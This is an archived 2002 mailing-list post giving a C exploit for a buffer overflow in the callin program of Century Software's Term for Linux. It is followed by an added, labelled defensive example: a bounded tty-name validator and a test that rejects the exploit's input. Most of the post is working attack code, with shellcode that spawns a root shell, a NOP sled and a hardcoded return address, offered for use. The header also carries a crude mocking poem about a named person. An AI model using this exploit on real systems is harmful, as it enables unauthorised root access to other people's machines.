Century Software Term Exploit

From: haikuat_private
Date: Tue Feb 26 2002 - 16:13:58 PST

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    /********************************************************/
    /* ex-callin.c - Haiku Hacker <haikuat_private>      */
    /* Exploits the buffer overflow in Century Software's   */
    /* calling component of the Term program for Linux.     */
    /********************************************************/
    /* Greets, love, and respect to:                        */
    /* KF, Merc, Synapse, UPT old and new, Lance Spitzner,  */
    /* egami, comega, jericho, and most importantly sl1k    */
    /* for his guidance, coaching, and tutoring.            */
    /********************************************************/
    /* RFP's Pants                                          */
    /* -----------                                          */
    /* Rain Forest Puppy                                    */
    /* Wears tight black pants to big cons                  */
    /* Does he have limp wrist?                             */
    /********************************************************/
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>     /* execl() */
    
    /* use this to specify the location of callin */
    #define CINPATH "./callin"
    
    
    int main(int argc, char **argv)
    {
            /* Shellcode borrowed from Aleph1 */
            char shellcode[] =
                    "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
                    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
                    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
                    "\xff\xff/bin/sh";
    
            char egg_string[300];
            int i;
            unsigned long offset = 0;
    
            if (argc > 1)
            {
                    offset = atoi(argv[1]);
            }
    
            memcpy(egg_string, "tty", 3);
    
            for (i = 3; i < 95; i++)
                    egg_string[i] = 'A';
    
            *(long *)(egg_string+95) = 0xbffff67c + offset;
    
            for (i = 99; i < 300; i++)
                    egg_string[i] = 0x90;
    
            strcpy(egg_string+(sizeof(egg_string)-strlen(shellcode)), shellcode);
    
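            /* the variadic list must end with a null pointer of type char * */
            execl(CINPATH, "callin", egg_string, (char *)NULL);
            return 1;       /* reached only if execl() fails */
    }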
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com
    
    wloEARECABoFAjx8JGETHGhhaWt1QGh1c2htYWlsLmNvbQAKCRDCt+udg2XXB76gAKC/
    O3RRCP2I5/7hFZ2bc1cv2cFI8QCaA7WqeVfOdKd+rITrhPqQsyoM74Y=
    =duZ2
    -----END PGP SIGNATURE-----
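
The fix for this class of bug is a bounded, allow-listed copy of the command-line argument. The following is an added example, not part of the original post and not Century Software's code; it assumes callin takes a tty device name as its first argument (inferred from the "tty" prefix above), and copy_tty_name, rejects_overlong_sample and TTY_NAME_MAX are hypothetical names.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define TTY_NAME_MAX 32   /* assumed limit, not taken from the product */

/* Hypothetical validator: copies a tty name argument into dst only if it
 * fits and holds nothing but characters a device name would use.
 * Returns 0 on success, -1 if rejected (dst is left as an empty string). */
int copy_tty_name(char *dst, size_t dstlen, const char *arg)
{
    size_t len, i;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (arg == NULL)
        return -1;
    /* Bounded scan: stop one past the limit instead of trusting the input. */
    for (len = 0; len <= TTY_NAME_MAX && arg[len] != '\0'; len++)
        ;
    if (len == 0 || len > TTY_NAME_MAX || len >= dstlen)
        return -1;
    /* Allow-list: letters, digits and '/' (e.g. "ttyS0", "pts/3"). */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '/')
            return -1;
    }
    memcpy(dst, arg, len + 1);   /* len + 1 includes the terminating NUL */
    return 0;
}

/* Constructed input with the same shape as the posted argument:
 * "tty", filler bytes, then non-printable bytes. Returns 1 if rejected. */
int rejects_overlong_sample(void)
{
    char sample[300], dst[TTY_NAME_MAX + 1];

    memset(sample, 'A', sizeof(sample));
    memcpy(sample, "tty", 3);
    memset(sample + 99, 0x90, sizeof(sample) - 100);
    sample[sizeof(sample) - 1] = '\0';
    return copy_tty_name(dst, sizeof(dst), sample) == -1 && dst[0] == '\0';
}

int main(void) { return rejects_overlong_sample() ? 0 : 1; }
```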
    


